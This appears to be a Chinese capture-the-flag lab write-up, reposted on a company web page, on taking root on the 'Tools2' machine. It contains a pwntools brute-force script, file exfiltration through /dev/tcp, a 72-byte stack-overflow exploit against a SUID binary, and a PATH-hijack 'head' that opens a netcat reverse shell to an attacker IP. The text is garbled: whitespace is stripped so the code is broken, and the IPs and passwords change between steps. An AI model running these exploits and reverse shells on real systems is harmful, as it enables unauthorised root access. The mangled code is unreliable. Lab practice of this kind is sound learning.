资讯动态

Tools2靶场学习笔记

发布时间:2026/8/26 18:04:13 来源:尧图企业网站定制
正文一、端口扫描与代码审计二、编写pwn脚本跑随机数三、文件传输逆向分析todd程序四、ida逆向发现todd可劫持命令函数计算偏移量五、靶机端口代理出来编写exp脚本连接上去做路径劫持操作获取flag。正文kali攻击机地址192.168.67.181靶场地址192.168.67.176一、端口扫描与代码审计在kali里使用nmap工具nmap192.168.67.176 -p-访问80端口代码审计能发现密码thehackerlabs针对1337端口nc连接过去看要求还要写随机数。二、编写pwn脚本跑随机数构造一个随机数的脚本frompwnimport*importreforiinrange(1000):rremote(192.168.67.176,1337)r.recvuntil(bPlease enter password: )r.sendline(bthehackerlabs)r.recvuntil(bPlease enter a number (1-1000): )r.sendline(b500)ar.recvall().decode()ifWrongnotina:print(a)break最后跑出来用户名和密码welcome/vulnyx在opt目录下发现可以提权的程序todd-rwsr-sr-x1root root16952Jun162025todd-普通二进制程序红色文件名setuid/setgid 标记高亮第 4 位 sSet‑UID 位SUID文件属主是 root设置 SUID 后不管哪个普通用户运行这个 todd 程序进程都会以文件所有者 root 身份执行第 7 位 sSet‑GID 位SGID运行时进程使用文件所属组 root 的权限✨CTF 考点SUID 提权普通用户执行./todd程序运行身份 root如果程序有漏洞就可以拿到 root 权限。权限拆解-rw s r‑ s r‑x属主权限 rw- SUID (s) → rw s用户组权限 r-- SGID (s) → r‑ s其他用户 r‑x任何人都可读、可执行三、文件传输逆向分析todd程序先分析一下这个todd程序是干什么的用攻击机接收nc-lp1234todd靶机上传cat todd/dev/tcp/192.168.67.181/1234四、ida逆向发现todd可劫持命令函数计算偏移量用ida 软件打开对着main函数F5反编译一下进入vulnerable函数 里这里可以看出使用gets函数会导致栈溢出。在靶机里使用pwndbg工具调式计算一下偏移量。pwndbg todd r在攻击机里生成100个数字测试偏移量msf-pattern_create-l100可以看到在靶机里将字符串Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2A写入地址0x7ffeecc7b3a8时发生栈溢出了。那我们在攻击机里计算一下偏移量msf-pattern_offset-qAc4A证明偏移量是72那就得生成72个字符A并生成4字节B:perl-leprint Ax72 . BBBB生成如下字符AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB五、靶机端口代理出来编写exp脚本连接上去做路径劫持操作获取flag。先在靶机里做一个端口转发socat TCP-LISTEN:12345,reuseaddr,fork EXEC:/opt/todd,pty,raw,echo0再到IDA里找到todd函数的地址F5反编译后空格键tab键能找到调用todd函数的地址:编写exp并在攻击机里运行frompwnimport*importre rremote(192.168.31.133,12345)r.recvuntil(bEnter password: )r.sendline(bhackmyvm)junkbA*72toddp64(0x4011B2)payloadjunktodd r.sendline(payload)r.interactive()可以看到执行了靶机里同目录下的a.txt文件。所以我们可以在靶机上去临时目录下做一个自己创造的head程序骗靶机去执行我们的head。操作如下cd/tmpechobusybox nc 192.168.31.188 1234 -e /bin/bashheadchmodxheadexportPATH/tmp:$PATHsocat TCP-LISTEN:12345,reuseaddr,fork EXEC:/opt/todd,pty,raw,echo0攻击机再开一个窗口监听1234端口nc-lp1234id成功获取到flag

读完文章,也想定制专属网站?

尧图设计师 24 小时内与您沟通定制方案

免费获取报价